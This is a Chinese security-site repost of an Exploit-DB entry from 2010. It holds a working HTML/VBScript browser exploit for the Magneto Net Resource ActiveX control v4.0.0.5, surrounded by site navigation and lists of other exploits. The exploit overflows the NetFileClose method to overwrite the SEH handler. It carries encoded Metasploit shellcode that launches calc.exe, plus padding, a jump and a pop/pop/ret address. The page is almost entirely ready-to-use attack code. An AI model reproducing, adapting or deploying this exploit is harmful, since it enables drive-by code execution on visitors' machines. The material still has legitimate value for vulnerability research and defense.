首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Magneto Net Resource ActiveX v4.0.0.5 NetFileClose Exploit (Universal)
来源:http://www.exploit-db.com 作者:dookie 发布时间:2010-04-16  

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit (Universal)
'Author: dookie
'Original PoC by:  s4squatch  - http://www.exploit-db.com/exploits/12206
'Vendor:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'SKNetResource.ocx
'Function NetFileClose ( ByVal strServerName As String ,  ByVal dwFileId As Long ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"
 
'win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
                        unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
                        unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
                        unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
                        unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
                        unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
                        unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
                        unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
                        unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
                        unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
                        unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
                        unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
                        unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
                        unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
                        unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
                        unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
                        unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
                        unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
                        unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
                        unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
                        unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _
                        unescape("%50%68")
 
'SEH overwrite - Around 620 Bytes for Shellcode
lead = String(394, "A")
nseh = unescape("%eb%06%90%90")
seh = unescape("%bc%08%01%10")  ' 100108BC p/p/r in SKNetResource.ocx
trailer = String(312, "B")

arg1 = lead + nseh + seh + shellcode + trailer
arg2=1
target.NetFileClose arg1 ,arg2
 
</script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sun Java Web Start Plugin Comm
·RPM Select/Elite v5.0 (.xml co
·Windows ANI LoadAniIcon() Chun
·Mocha LPD v1.9 Remote Buffer O
·linux/x86 - execve("/bin/sh",
·Book Library v1.4.162 Local Do
·Camiro-CMS_beta-0.1 (fckeditor
·MovieLibrary v1.4.401 Local Do
·Magneto Net Resource ActiveX v
·55 bytes SLoc-DoS shellcode by
·Magneto Net Resource ActiveX v
·6 bytes DoS-Badger-Game shellc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved